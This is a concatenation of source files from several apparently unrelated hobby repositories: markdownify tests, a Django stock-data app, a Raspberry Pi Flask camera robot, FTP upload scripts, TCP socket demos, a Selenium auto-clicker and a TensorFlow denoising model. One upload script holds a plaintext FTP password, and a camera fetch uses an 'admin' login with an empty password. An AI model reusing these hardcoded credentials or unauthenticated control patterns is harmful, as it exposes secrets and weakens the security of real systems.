assert md('<img src="/path/to/img.jpg" alt="Alt text" />') == ''
def test_div():
assert md('Hello</div> World') == 'Hello World'
def test_table():
assert md(table) == '| Firstname | Lastname | Age |\n| --- | --- | --- |\n| Jill | Smith | 50 |\n| Eve | Jackson | 94 |'
assert md(table_head_body) == '| Firstname | Lastname | Age |\n| --- | --- | --- |\n| Jill | Smith | 50 |\n| Eve | Jackson | 94 |'
assert md(table_missing_text) == '| | Lastname | Age |\n| --- | --- | --- |\n| Jill | | 50 |\n| Eve | Jackson | 94 |'
def test_strong_em_symbol():
assert md('<strong>Hello</strong>', strong_em_symbol=UNDERSCORE) == '__Hello__'
assert md('<b>Hello</b>', strong_em_symbol=UNDERSCORE) == '__Hello__'
assert md('<em>Hello</em>', strong_em_symbol=UNDERSCORE) == '_Hello_'
assert md('<i>Hello</i>', strong_em_symbol=UNDERSCORE) == '_Hello_'
def test_newline_style():
assert md('a<br />b<br />c', newline_style=BACKSLASH) == 'a\\\nb\\\nc'
``` |
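As a quick reference, a sketch of the conversion options these tests exercise, used outside the test suite; the expected outputs in the comments are taken from the assertions above.
```python
from markdownify import markdownify as md, ATX, ATX_CLOSED, BACKSLASH, UNDERSCORE

md('<h1>Hello</h1>', heading_style=ATX)           # '# Hello\n\n'
md('<h1>Hello</h1>', heading_style=ATX_CLOSED)    # '# Hello #\n\n'
md('<b>Hello</b>', strong_em_symbol=UNDERSCORE)   # '__Hello__'
md('a<br />b', newline_style=BACKSLASH)           # 'a\\\nb'
md('<ul><li>a</li><li>b</li></ul>', bullets='-')  # '- a\n- b\n'
```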
{
"source": "jiun0507/minestock",
"score": 2
} |
#### File: management/commands/import_company.py
```python
from django.core.management.base import BaseCommand, CommandError
from django.db import IntegrityError
from polygon.rest.models.definitions import Company
from company.models import CompanyModel
from Interface.polygon_api import PolygonInterface
from keys import Keys
class Command(BaseCommand):
help = "Closes the specified poll for voting"
def add_arguments(self, parser):
parser.add_argument("start", type=int)
parser.add_argument("end", type=int)
def handle(self, *args, **options):
start = options["start"]
end = options["end"]
self.polygon = PolygonInterface(Keys())
for page_num in list(range(start, end)):
tickers = self.polygon.get_polygon_company_list(page=page_num)
for ticker in tickers:
try:
company = CompanyModel(
ticker=ticker["ticker"],
name=ticker["name"],
market=ticker["market"],
locale=ticker["locale"],
active=ticker["active"],
)
company.save()
except IntegrityError:
pass
```
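A hedged sketch of driving this command programmatically instead of via `manage.py`; the page range is illustrative.
```python
# Equivalent to running `python manage.py import_company 1 5` on the CLI;
# pages 1 through 4 of the Polygon company list would be imported.
from django.core.management import call_command

call_command('import_company', '1', '5')
```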
#### File: minestock/financial_statement/models.py
```python
from dataclasses import dataclass
from datetime import datetime
from django.db import models
from django.db.models.fields import DateTimeField
from django.urls import reverse
@dataclass
class FinancialStatementEntity:
ticker: str
period: str
calendar_date: str
report_period: str
updated: str
accumulated_other_comprehensive_income: int
assets: int
assets_average: int
assets_current: int
asset_turnover: int
assets_non_current: int
book_value_per_share: int
capital_expenditure: int
cash_and_equivalents: int
cash_and_equivalentsUSD: int
cost_of_revenue: int
consolidated_income: int
current_ratio: int
debt_to_equity_ratio: int
debt: int
debt_current: int
debt_non_current: int
debtUSD: int
deferred_revenue: int
depreciation_amortization_and_accretion: int
deposits: int
dividend_yield: int
dividends_per_basic_common_share: int
earning_before_interest_taxes: int
earnings_before_interest_taxes_depreciation_amortization: int
EBITDA_margin: int
earnings_before_interest_taxes_depreciation_amortizationUSD: int
earning_before_interest_taxesUSD: int
earnings_before_tax: int
earnings_per_basic_share: int
earnings_per_diluted_share: int
earnings_per_basic_shareUSD: int
shareholders_equity: int
average_equity: int
shareholders_equityUSD: int
enterprise_value: int
enterprise_value_overEBIT: int
enterprise_value_overEBITDA: int
free_cash_flow: int
free_cash_flow_per_share: int
foreign_currencyUSD_exchange_Rate: int
gross_profit: int
gross_margin: int
goodwill_and_intangible_assets: int
interest_expense: int
invested_Capital: int
invested_capital_average: int
inventory: int
investments: int
investments_Current: int
investments_non_current: int
total_liabilities: int
current_liabilities: int
liabilities_non_current: int
market_capitalization: int
net_cash_flow: int
net_cash_flow_business_acquisitions_disposals: int
issuance_equity_shares: int
issuance_debt_securities: int
payment_dividends_other_cash_distributions: int
net_cash_flow_from_financing: int
net_cash_flow_from_investing: int
net_cash_flow_investment_acquisitions_disposals: int
net_cash_flow_from_operations: int
effect_of_exchange_rate_changes_on_cash: int
net_income: int
net_income_common_stock: int
net_income_common_stockUSD: int
net_loss_income_from_discontinued_operations: int
net_income_to_non_controlling_interests: int
profit_margin: int
operating_expenses: int
operating_income: int
trade_and_non_trade_payables: int
payout_ratio: int
price_to_book_value: int
price_earnings: int
price_to_earnings_ratio: int
property_plant_equipment_net: int
preferred_dividends_income_statement_impact: int
share_price_adjusted_close: int
price_sales: int
price_to_sales_ratio: int
trade_and_non_trade_receivables: int
accumulated_retained_earnings_deficit: int
revenues: int
revenuesUSD: int
research_and_development_expense: int
return_on_average_assets: int
return_on_average_equity: int
return_on_invested_capital: int
return_on_sales: int
share_based_compensation: int
selling_general_and_administrative_expense: int
share_factor: int
shares: int
weighted_average_shares: int
weighted_average_shares_diluted: int
sales_per_share: int
tangible_asset_value: int
tax_assets: int
income_tax_expense: int
tax_liabilities: int
tangible_assets_book_value_per_share: int
working_capital: int
class FinancialStatement(models.Model):
ticker = models.CharField(max_length=10)
period = models.CharField(max_length=10)
calendar_date = models.CharField(max_length=10)
report_period = models.CharField(max_length=10)
updated = models.CharField(max_length=10)
accumulated_other_comprehensive_income = models.IntegerField()
assets = models.IntegerField()
assets_average = models.IntegerField()
assets_current = models.IntegerField()
asset_turnover = models.IntegerField()
assets_non_current = models.IntegerField()
book_value_per_share = models.IntegerField()
capital_expenditure = models.IntegerField()
cash_and_equivalents = models.IntegerField()
cash_and_equivalentsUSD = models.IntegerField()
cost_of_revenue = models.IntegerField()
consolidated_income = models.IntegerField()
current_ratio = models.IntegerField()
debt_to_equity_ratio = models.IntegerField()
debt = models.IntegerField()
debt_current = models.IntegerField()
debt_non_current = models.IntegerField()
debtUSD = models.IntegerField()
deferred_revenue = models.IntegerField()
depreciation_amortization_and_accretion = models.IntegerField()
deposits = models.IntegerField()
dividend_yield = models.IntegerField()
dividends_per_basic_common_share = models.IntegerField()
earning_before_interest_taxes = models.IntegerField()
earnings_before_interest_taxes_depreciation_amortization = models.IntegerField()
EBITDA_margin = models.IntegerField()
earnings_before_interest_taxes_depreciation_amortizationUSD = models.IntegerField()
earning_before_interest_taxesUSD = models.IntegerField()
earnings_before_tax = models.IntegerField()
earnings_per_basic_share = models.IntegerField()
earnings_per_diluted_share = models.IntegerField()
earnings_per_basic_shareUSD = models.IntegerField()
shareholders_equity = models.IntegerField()
average_equity = models.IntegerField()
shareholders_equityUSD = models.IntegerField()
enterprise_value = models.IntegerField()
enterprise_value_overEBIT = models.IntegerField()
enterprise_value_overEBITDA = models.IntegerField()
free_cash_flow = models.IntegerField()
free_cash_flow_per_share = models.IntegerField()
foreign_currencyUSD_exchange_Rate = models.IntegerField()
gross_profit = models.IntegerField()
gross_margin = models.IntegerField()
goodwill_and_intangible_assets = models.IntegerField()
interest_expense = models.IntegerField()
invested_Capital = models.IntegerField()
invested_capital_average = models.IntegerField()
inventory = models.IntegerField()
investments = models.IntegerField()
investments_Current = models.IntegerField()
investments_non_current = models.IntegerField()
total_liabilities = models.IntegerField()
current_liabilities = models.IntegerField()
liabilities_non_current = models.IntegerField()
market_capitalization = models.IntegerField()
net_cash_flow = models.IntegerField()
net_cash_flow_business_acquisitions_disposals = models.IntegerField()
issuance_equity_shares = models.IntegerField()
issuance_debt_securities = models.IntegerField()
payment_dividends_other_cash_distributions = models.IntegerField()
net_cash_flow_from_financing = models.IntegerField()
net_cash_flow_from_investing = models.IntegerField()
net_cash_flow_investment_acquisitions_disposals = models.IntegerField()
net_cash_flow_from_operations = models.IntegerField()
effect_of_exchange_rate_changes_on_cash = models.IntegerField()
net_income = models.IntegerField()
net_income_common_stock = models.IntegerField()
net_income_common_stockUSD = models.IntegerField()
net_loss_income_from_discontinued_operations = models.IntegerField()
net_income_to_non_controlling_interests = models.IntegerField()
profit_margin = models.IntegerField()
operating_expenses = models.IntegerField()
operating_income = models.IntegerField()
trade_and_non_trade_payables = models.IntegerField()
payout_ratio = models.IntegerField()
price_to_book_value = models.IntegerField()
price_earnings = models.IntegerField()
price_to_earnings_ratio = models.IntegerField()
property_plant_equipment_net = models.IntegerField()
preferred_dividends_income_statement_impact = models.IntegerField()
share_price_adjusted_close = models.IntegerField()
price_sales = models.IntegerField()
price_to_sales_ratio = models.IntegerField()
trade_and_non_trade_receivables = models.IntegerField()
accumulated_retained_earnings_deficit = models.IntegerField()
revenues = models.IntegerField()
revenuesUSD = models.IntegerField()
research_and_development_expense = models.IntegerField()
return_on_average_assets = models.IntegerField()
return_on_average_equity = models.IntegerField()
return_on_invested_capital = models.IntegerField()
return_on_sales = models.IntegerField()
share_based_compensation = models.IntegerField()
selling_general_and_administrative_expense = models.IntegerField()
share_factor = models.IntegerField()
shares = models.IntegerField()
weighted_average_shares = models.IntegerField()
weighted_average_shares_diluted = models.IntegerField()
sales_per_share = models.IntegerField()
tangible_asset_value = models.IntegerField()
tax_assets = models.IntegerField()
income_tax_expense = models.IntegerField()
tax_liabilities = models.IntegerField()
tangible_assets_book_value_per_share = models.IntegerField()
working_capital = models.IntegerField()
def get_absolute_url(self):
return reverse(
"financial_statement:financial_statement", kwargs={"id": self.id}
)
class Meta:
constraints = [
models.UniqueConstraint(
fields=["ticker", "period", "calendar_date", "report_period"],
name="financial statement quarterly/yearly restraint",
),
]
```
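A hedged sketch of the URLconf entry that `get_absolute_url` assumes: `reverse("financial_statement:financial_statement", kwargs={"id": ...})` needs an app namespace and a pattern with an `id` converter. The view name below is illustrative only; the real view is not shown in this file.

```python
# urls.py for the financial_statement app (illustrative; the view name is an assumption).
from django.urls import path
from . import views

app_name = "financial_statement"

urlpatterns = [
    path("<int:id>/", views.financial_statement_detail, name="financial_statement"),
]
```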
#### File: management/commands/price_alert.py
```python
from Interface.iex_api import IEXInterface
from django.core.management.base import BaseCommand, CommandError
from company.models import CompanyModel
from Interface.polygon_api import PolygonInterface
from keys import Keys
class Command(BaseCommand):
    help = "Check current prices for companies that have notifications configured"
def add_arguments(self, parser):
# parser.add_argument("start", type=int)
pass
def handle(self, *args, **options):
iex_interface = IEXInterface(Keys())
companies = CompanyModel.objects.filter(notification__isnull=False)
for company in companies:
price = iex_interface.get_ticker_quote(ticker=company.ticker)
```
#### File: minestock/valuation/forms.py
```python
from django import forms
from . import models
class ValuationForm(forms.Form):
DCF = "dcf"
    REPRODUCTION_COST = "reproduction_cst"
OTHER = "other"
METHOD_CHOICES = (
(DCF, "DCF"),
        (REPRODUCTION_COST, "Reproduction_cost"),
(OTHER, "Other"),
)
review = forms.CharField()
ticker = forms.CharField()
method = forms.ChoiceField(choices=METHOD_CHOICES)
value = forms.FloatField()
formula = forms.CharField()
financial_statement_id = forms.IntegerField(widget=forms.HiddenInput())
# financial_statement_id.widget.attrs.update({"readonly": True})
financial_statement_id.widget.attrs["readonly"] = True
def clean(self):
review = self.cleaned_data.get("review")
ticker = self.cleaned_data.get("ticker")
method = self.cleaned_data.get("method")
value = self.cleaned_data.get("value")
formula = self.cleaned_data.get("formula")
if "process" in self.data:
raise forms.ValidationError("The formula is computed.")
else:
raise forms.ValidationError("This is submit")
        if ticker is None or value is None or method is None:
return None
return self.cleaned_data
``` |
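A minimal sketch of exercising `ValuationForm` from a Django shell (`python manage.py shell`); the import path and field values are illustrative. Note that, as written, `clean()` raises unconditionally, so `is_valid()` returns `False` and the message lands in `form.errors`.

```python
# Hypothetical quick check of ValuationForm validation (values are made up).
from valuation.forms import ValuationForm

data = {
    "review": "Cheap relative to book value",
    "ticker": "AAPL",
    "method": ValuationForm.DCF,
    "value": 123.45,
    "formula": "sum(discounted_cash_flows)",
    "financial_statement_id": 1,
}
form = ValuationForm(data)
print(form.is_valid())   # False: clean() always raises
print(form.errors)       # the ValidationError message shows up under '__all__'
```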
{
"source": "Jiunan73/flask",
"score": 3
} |
#### File: flask/back/app_2cam.py
```python
from importlib import import_module
import os
import time
from flask import Flask, render_template, Response
# import camera driver
#if os.environ.get('CAMERA'):
# Camera = import_module('camera_' + os.environ['CAMERA']).Camera
#else:
# from camera import Camera
# Raspberry Pi camera module (requires picamera package)
from camera_opencv import Camera
from camera_opencv2 import Camera as Camera2
import RPi.GPIO as gpio
GOPIN=18
BACKPIN=23
LEFTPIN=24
RIGHTPIN=25
gpio.setwarnings(False)
gpio.setmode(gpio.BCM)
gpio.setup(GOPIN, gpio.OUT)
gpio.setup(BACKPIN, gpio.OUT)
gpio.setup(LEFTPIN, gpio.OUT)
gpio.setup(RIGHTPIN, gpio.OUT)
app = Flask(__name__)
@app.route('/')
@app.route('/<cmd>')
def index(cmd=None):
"""Video streaming home page."""
if cmd == 'go':
setio(True, False, False, False)
elif cmd == 'stop':
setio(False, False, False, False)
elif cmd == 'back':
setio(False, True, False, False)
elif cmd == 'right':
setio(False, False, True, False)
elif cmd == 'left':
setio(False, False, False, True)
return render_template('index.html',cmd=cmd)
def setio(p14, p15, p18, p23):
gpio.output(GOPIN, p14)
gpio.output(BACKPIN, p15)
gpio.output(LEFTPIN, p18)
gpio.output(RIGHTPIN, p23)
"""time.sleep(1)
gpio.output(14, False)
gpio.output(15, False)
gpio.output(18, False)
gpio.output(23, False) """
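# Note: the second index() below is an unused duplicate; Flask keeps the first,
# decorated index() registered for '/' and '/<cmd>', so this definition is never routed.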
def index():
"""Video streaming home page."""
return render_template('index.html')
def gen0(camera):
"""Video streaming generator function."""
cnt=[0,0,0,0]
while True:
frame = camera.get_frame()
for i in range(4):
sensor1=camera.get_sensor(i)
if sensor1 < 10 :
print(i)
print ("<10cm")
cnt[i]=cnt[i]+1
                if cnt[i] > 10 :
setio(False, False, False, False)
cnt[i]=0
else:
cnt[i]=0
yield (b'--frame\r\n'
b'Content-Type: image/jpeg\r\n\r\n' + frame + b'\r\n')
def gen2(camera):
"""Video streaming generator function."""
while True:
frame = camera.get_frame()
#print(camera.get_sensor())
yield (b'--frame\r\n'
b'Content-Type: image/jpeg\r\n\r\n' + frame + b'\r\n')
@app.route('/video_feed0')
def video_feed0():
"""Video streaming route. Put this in the src attribute of an img tag."""
a=Camera
print("Video streaming=",a.video_source)
return Response(gen0(a()),
mimetype='multipart/x-mixed-replace; boundary=frame')
@app.route('/video_feed2')
def video_feed2():
"""Video streaming route. Put this in the src attribute of an img tag."""
b=Camera2
print("Video streaming=",b.video_source)
return Response(gen2(b()),
mimetype='multipart/x-mixed-replace; boundary=frame')
if __name__ == '__main__':
app.run(host='0.0.0.0', threaded=True)
```
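A stripped-down sketch of the same `multipart/x-mixed-replace` streaming pattern used by `gen0`/`gen2`, reading the camera with OpenCV directly so it runs without the `camera_opencv` wrapper classes or GPIO wiring. It assumes the `opencv-python` package and a webcam at index 0.

```python
# Minimal MJPEG streaming sketch (assumes opencv-python and a camera at index 0).
import cv2
from flask import Flask, Response

app = Flask(__name__)
capture = cv2.VideoCapture(0)

def mjpeg_stream():
    while True:
        ok, frame = capture.read()
        if not ok:
            break
        ok, jpeg = cv2.imencode('.jpg', frame)
        if not ok:
            continue
        yield (b'--frame\r\n'
               b'Content-Type: image/jpeg\r\n\r\n' + jpeg.tobytes() + b'\r\n')

@app.route('/video_feed')
def video_feed():
    return Response(mjpeg_stream(),
                    mimetype='multipart/x-mixed-replace; boundary=frame')

if __name__ == '__main__':
    app.run(host='0.0.0.0', threaded=True)
```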
#### File: Jiunan73/flask/camera_opencv3.py
```python
import requests,time
from base_camera3 import BaseCamera
class Camera(BaseCamera):
@staticmethod
def frames():
while True:
r=requests.get('http://192.168.2.161/image/jpeg.cgi',auth=('admin',''))
img=r.content
yield img
```
#### File: Jiunan73/flask/ftp.py
```python
import time,os,datetime
from ftplib import FTP
fall_file=''
ir_file=''
def ftp_upload(filepath,dirpath):
IP = '192.168.31.102'
user = 'johnlin'
password = '<PASSWORD>'
filename = os.path.basename(filepath)
ftp=FTP()
#ftp.set_debuglevel(2)
ftp.connect(IP)
ftp.login(user,password)
ftp.cwd("/home/johnlin/ftp/"+dirpath)
ftp.storbinary('STOR %s'%filename, open(filepath, 'rb',8192))
print('success')
if __name__ == '__main__':
while True:
try:
datestr=datetime.datetime.now().strftime('%Y%m%d')
b=os.listdir('static/ir_cam/'+datestr+'/AD-HF048-P-192.168.1.20')
a=sorted(b)
ir_path='static/ir_cam/'+datestr+'/AD-HF048-P-192.168.1.20/'+a[len(a)-1]
print(ir_path)
if not ir_path==ir_file:
print('ftp upload')
ftp_upload(ir_path,'ir')
ir_file=ir_path
except:
print('ir error')
try:
b= os.listdir('static/ir_cam/fall/')
for s in b:
if s.endswith('.jpg')==False:
#print('del ',s)
b.remove(s)
a=sorted(b)
fall_path='static/ir_cam/fall/'+a[len(a)-1]
print(fall_path)
if not fall_path==fall_file:
print('ftp upload')
ftp_upload(fall_path,'fall')
fall_file=fall_path
except:
print('fall error')
time.sleep(5)
```
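A variant sketch of `ftp_upload` that always closes the FTP session and the local file by using context managers. Host, user, and target directory mirror the assumptions above, and the password stays a placeholder.

```python
# Same ftplib upload with explicit cleanup (host/user are the script's assumptions,
# password is a placeholder).
import os
from ftplib import FTP

def ftp_upload_safe(filepath, dirpath, host='192.168.31.102',
                    user='johnlin', password='***'):
    """Upload one file and always close the connection and file handle."""
    filename = os.path.basename(filepath)
    with FTP(host) as ftp, open(filepath, 'rb') as fp:
        ftp.login(user, password)
        ftp.cwd('/home/johnlin/ftp/' + dirpath)
        ftp.storbinary('STOR %s' % filename, fp, 8192)
```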
#### File: flask/home/client.py
```python
import sys
import socket
import threading
import os
import time
def connectTCP(ip,port):
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((ip,port))
return client
def main():
while True:
remote_server = connectTCP('10.97.82.24',5001)
time.sleep(5)
remote_server.close()
time.sleep(1)
if __name__ == '__main__':
main()
```
#### File: flask/home/ftp.py
```python
import time,os
from ftplib import FTP
fall_file=''
ir_file=''
def ftp_upload(filepath):
IP = '127.0.0.1'
user = 'johnlin'
password = '<PASSWORD>'
filename = os.path.basename(filepath)
ftp=FTP()
#ftp.set_debuglevel(2)
ftp.connect(IP)
ftp.login(user,password)
ftp.cwd("/home/johnlin/ftp")
ftp.storbinary('STOR %s'%filename, open(filepath, 'rb',8192))
print('success')
if __name__ == '__main__':
while True:
b=os.listdir('/home/pi/flask/static/ir_cam/20200807/AD-HF048-P-192.168.1.20')
a=sorted(b)
ir_path='/home/pi/flask/static/ir_cam/20200807/AD-HF048-P-192.168.1.20/'+a[len(a)-1]
if not ir_path==ir_file:
ftp_upload(ir_path)
ir_file=ir_path
b= os.listdir('/home/pi/flask/static/ir_cam/fall/')
for s in b:
if s.endswith('.jpg')==False:
print('del ',s)
b.remove(s)
a=sorted(b)
fall_path='/home/pi/flask/static/ir_cam/fall/'+a[len(a)-1]
print(fall_path)
if not fall_path==fall_file:
ftp_upload(fall_path)
fall_file=fall_path
time.sleep(5)
```
#### File: flask/home/serverTCP.py
```python
import socket
import threading
bind_ip = "0.0.0.0"
bind_port = 4001
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((bind_ip, bind_port))
server.listen(5)
print("[*] Listening on %s:%d" % (bind_ip, bind_port))
def handle_client(client_socket):
request = client_socket.recv(1024)
    print("[*] Received: %s" % request)
    client_socket.send(b"ACK!")
client_socket.close()
while True:
client, addr = server.accept()
    print("[*] Accepted connection from: %s:%d" % (addr[0], addr[1]))
client_handler = threading.Thread(target=handle_client, args=(client,))
client_handler.start()
```
#### File: static/ir_cam/upload.py
```python
from ftplib import FTP
import os
import fileinput
import time
# The while(True) loop below runs indefinitely; its condition is always true.
def ftp_upload(localfile, remotefile):
fp = open(localfile, 'rb')
ftp.storbinary('STOR %s' % os.path.basename(localfile), fp, 1024)
fp.close()
#print ("after upload " + localfile + " to " + remotefile)
print('1')
localdir = "/home/thomaslee/Desktop/Fall_detect/fall/image/"
def upload_img(file):
ftp_upload(localdir +"/"+ file, file)
while(True):
time.sleep(10)
ftp = FTP()
ftp.set_debuglevel(2)
try:
ftp.connect('192.168.0.122', 21)
ftp.login('pi','Auo+1231')
ftp.cwd('/home/pi/tmp')
except Exception as e:
print(e)
continue
lastlist = []
newfiles = os.listdir(localdir)
#newfiles = list(set(currentlist) - set(lastlist))
if len(newfiles) == 0:
print ('No files need to upload')
else:
print(len(newfiles))
for needupload in newfiles:
print( "uploading " + localdir + '/'+ needupload)
upload_img(needupload)
ftp.quit()
``` |
{
"source": "jiunbae/auto-popcat",
"score": 3
} |
#### File: jiunbae/auto-popcat/auto-cat.py
```python
import argparse
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
class Handler:
class URL:
MAIN = "https://popcat.click"
class Config:
DEBUG = False
HEADLESS = False
def __init__(self, driver_path: str):
options = Options()
if Handler.Config.HEADLESS:
options.add_argument("headless")
options.add_argument("window-size=540,1024")
options.add_argument("disable-gpu")
options.add_argument("disable-infobars")
# options.add_argument("disable-popup-blocking")
options.add_argument("disable-extensions")
options.add_argument("start-maximized")
options.add_argument("no-sandbox")
options.add_argument("disable-dev-shm-usage")
options.add_argument('ignore-certificate-errors')
options.add_argument('ignore-ssl-errors')
options.add_experimental_option('prefs', {
'profile.default_content_setting_values': {
# 'cookies': 2,
# 'images': 2,
'plugins': 2,
'popups': 2,
'geolocation': 2,
'notifications': 2,
'auto_select_certificate': 2,
'fullscreen': 2,
'mouselock': 2,
'mixed_script': 2,
'media_stream': 2,
'media_stream_mic': 2,
'media_stream_camera': 2,
'protocol_handlers': 2,
'ppapi_broker': 2,
'automatic_downloads': 2,
'midi_sysex': 2,
'push_messaging': 2,
'ssl_cert_decisions': 2,
'metro_switch_to_desktop': 2,
'protected_media_identifier': 2,
'app_banner': 2,
'site_engagement': 2,
'durable_storage': 2
}
})
self.driver = webdriver.Chrome(driver_path, options=options)
def __call__(self, count: int = 0):
self.driver.get(Handler.URL.MAIN)
if not count:
count = -1
while count:
element = self.driver.find_element_by_class_name('cat-img')
element.click()
count -= 1
def main(args: argparse.Namespace):
Handler.Config.DEBUG = args.debug
Handler.Config.HEADLESS = args.headless
handler = Handler(args.driver)
handler(args.count)
if __name__ == "__main__":
parser = argparse.ArgumentParser("Auto Cat Click")
parser.add_argument('--driver', type=str, default='./bin/chromedriver.exe',
help="driver path")
parser.add_argument('--count', type=int, default=0,
help="click $count times")
parser.add_argument('--debug', action='store_true', default=False,
help="driver path")
parser.add_argument('--headless', action='store_true', default=False,
help="headless option")
args = parser.parse_args()
main(args)
``` |
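The `find_element_by_class_name` helper used above was deprecated in Selenium 4 and removed in 4.3, and the driver path is now passed through a `Service` object rather than positionally. A hedged sketch of the equivalent calls in the newer API:

```python
# Selenium 4 style equivalent of the core calls in the click loop.
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.chrome.service import Service

driver = webdriver.Chrome(service=Service('./bin/chromedriver.exe'))
driver.get("https://popcat.click")
driver.find_element(By.CLASS_NAME, 'cat-img').click()
driver.quit()
```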
{
"source": "jiunbae/crawltools",
"score": 3
} |
#### File: crawltools/utils/beholder.py
```python
from typing import Callable
from collections import defaultdict
class Beholder(type):
__inheritors__ = defaultdict(dict)
def __new__(mcs, name, bases, dct):
klass = type.__new__(mcs, name, bases, dct)
for attribute in filter(
lambda attr:
not attr.startswith('__') and
not callable(getattr(klass, attr)), dir(klass)):
setattr(mcs, attribute, getattr(klass, attribute))
for base in klass.mro()[1:-1]:
mcs.__inheritors__[base][Beholder._process(klass.__name__)] = klass
return klass
@staticmethod
def _process(name):
return name.lower().replace('-', '_')
@property
def __modules__(cls):
return cls.__inheritors__[cls]
def get(cls, name, default=None, process: Callable = None):
return cls.__modules__.get((process or cls._process)(name), default)
``` |
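A hypothetical usage sketch of the `Beholder` registry: any class that uses it as a metaclass collects its subclasses in `__inheritors__`, keyed by the lower-cased class name, and exposes them through `__modules__` and `get()`.

```python
# Hypothetical registry usage (class names are illustrative).
class Crawler(metaclass=Beholder):
    pass

class NewsCrawler(Crawler):
    pass

class ImageCrawler(Crawler):
    pass

print(Crawler.__modules__)          # maps 'newscrawler' and 'imagecrawler' to the subclasses
print(Crawler.get('NewsCrawler'))   # NewsCrawler; the lookup name is normalised by _process()
print(Crawler.get('missing'))       # None (the default)
```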
{
"source": "jiunbae/ITE4053",
"score": 3
} |
#### File: ImageDenoising/network/denoising.py
```python
import tensorflow as tf
from tensorflow.keras import backend as K
from tensorflow.keras import models as KM
from tensorflow.keras import layers as KL
class DenoisingNetwork(object):
def __new__(cls, mode: str) \
-> KM.Model:
assert mode in ['base', 'skip', 'bn']
inputs = KL.Input(shape=[None, None, 3],
name="input_image")
x = inputs
x = KL.Conv2D(64, (3, 3), padding="SAME",
kernel_initializer='random_uniform',
bias_initializer='zeros',
name="layer1")(x)
if mode == 'bn':
x = KL.BatchNormalization()(x)
x = KL.ReLU()(x)
x = KL.Conv2D(64, (3, 3), padding="SAME",
kernel_initializer='random_uniform',
bias_initializer='zeros',
name="layer2")(x)
if mode == 'bn':
x = KL.BatchNormalization()(x)
x = KL.ReLU()(x)
x = KL.Conv2D(64, (3, 3), padding="SAME",
kernel_initializer='random_uniform',
bias_initializer='zeros',
name="layer3")(x)
if mode == 'bn':
x = KL.BatchNormalization()(x)
x = KL.ReLU()(x)
x = KL.Conv2D(64, (3, 3), padding="SAME",
kernel_initializer='random_uniform',
bias_initializer='zeros',
name="layer4")(x)
if mode == 'bn':
x = KL.BatchNormalization()(x)
x = KL.ReLU()(x)
x = KL.Conv2D(3, (3, 3), padding="SAME",
kernel_initializer='random_uniform',
bias_initializer='zeros',
name="layer5")(x)
if mode == 'bn':
x = KL.BatchNormalization()(x)
x = KL.ReLU()(x)
if mode == 'skip' or mode == 'bn':
x = KL.average([x, inputs])
return KM.Model(inputs=inputs, outputs=x,
name='denoising')
@staticmethod
def loss(y_true: tf.Tensor, y_pred: tf.Tensor) \
-> tf.Tensor:
return K.mean(K.square(y_pred - y_true))
@classmethod
def metric(cls, y_true: tf.Tensor, y_pred: tf.Tensor) \
-> tf.Tensor:
return tf.image.psnr(y_true, y_pred, max_val=1.)
@classmethod
def compile(cls, model, optimizer, loss, metric)\
-> None:
model.compile(optimizer=optimizer,
loss=loss,
metrics=[metric])
```
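A short sketch of how the class is meant to be used: `__new__` returns a plain `tf.keras` `Model`, which is then compiled through the class helpers. This assumes TensorFlow 2.x; `'bn'` selects the batch-normalised variant.

```python
# Build and compile the denoising network (TensorFlow 2.x assumed).
from tensorflow.keras import optimizers as optim

model = DenoisingNetwork('bn')
DenoisingNetwork.compile(model,
                         optimizer=optim.Adam(learning_rate=1e-3),
                         loss=DenoisingNetwork.loss,
                         metric=DenoisingNetwork.metric)
model.summary()
```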
#### File: ImageDenoising/scripts/Model1.py
```python
from typing import Tuple, List
import argparse
import random
from pathlib import Path
from itertools import chain
from functools import reduce
import cv2
import numpy as np
import tensorflow as tf
import tensorflow.keras as keras
from tensorflow.keras.utils import Sequence
from tensorflow.keras import optimizers as optim
from tensorflow.keras import backend as K
from tensorflow.keras import models as KM
from tensorflow.keras import layers as KL
def init(seed: int):
random.seed(seed)
np.random.seed(seed)
class Transform:
def __init__(self, *args, **kwargs):
pass
def __call__(self, image: np.ndarray):
pass
class GaussianNoise(Transform):
def __init__(self, size: Tuple[int, int] = None, mean: float = .0, std: float = .1):
super(GaussianNoise, self).__init__()
self.size = size
self.mean = mean
self.std = std
def __call__(self, image: np.ndarray):
super(GaussianNoise, self).__call__(image)
image += np.random.normal(self.mean, self.std, self.size)
return image
class Crop(Transform):
def __init__(self, size: Tuple[int, int] = None, pos: Tuple[int, int] = None):
super(Crop, self).__init__()
self.size = size
self.pos = pos
def __call__(self, image: np.ndarray):
super(Crop, self).__call__(image)
w, h = self.size or (
np.random.randint(int(np.size(image, 0) / 2)),
np.random.randint(int(np.size(image, 1) / 2)),
)
x, y = self.pos or (
np.random.randint(np.size(image, 0) - w),
np.random.randint(np.size(image, 1) - h),
)
return image[x:x + w, y:y + h]
class Resize(Transform):
def __init__(self, size: Tuple[int, int] = (0, 0), scale: float = 1.,
metric=cv2.INTER_CUBIC):
super(Resize, self).__init__()
self.size = size
self.scale = scale
self.metric = metric
def __call__(self, image: np.ndarray):
scale = self.scale
if self.size == (0, 0) and self.scale == 1.:
scale = (np.random.rand(1) * .5 + .5)[0]
return cv2.resize(image, self.size, fx=scale, fy=scale,
interpolation=self.metric)
class Eval:
def __init__(self, filename: str):
self.image = np.expand_dims(cv2.imread(filename) / 255., axis=0)
def set_result(self, image: np.ndarray):
self.image = image
return self
def to_png(self, filename: str):
*path, ext = filename.split('.')
filename = 'Model1.png'
cv2.imwrite(filename, self.image)
class Dataset(keras.utils.Sequence):
def __init__(self, train: bool = True,
source_transforms: List[Transform] = None,
target_transforms: List[Transform] = None,
batch: int = 32, shuffle: bool = True):
self.batch = batch
self.shuffle = shuffle
self.channels = 3
self.is_training = True
(self.x_train, _), (self.x_test, _) = keras.datasets.cifar10.load_data()
self.images = self.x_train
self.size = self.x_train[0].shape[:2]
self.source_transforms = source_transforms or []
self.target_transforms = target_transforms or []
self.indices = np.arange(len(self.x_train))
def train(self, flag: bool = True):
self.is_training = flag
def eval(self):
self.train(False)
def on_epoch_end(self) \
-> None:
if self.shuffle:
np.random.shuffle(self.indices)
def __len__(self) \
-> int:
return len(self.images)
def __getitem__(self, item: int) \
-> Tuple[np.ndarray, np.ndarray]:
sources = np.empty((self.batch, *self.size, self.channels), dtype=np.float32)
targets = np.empty((self.batch, *self.size, self.channels), dtype=np.float32)
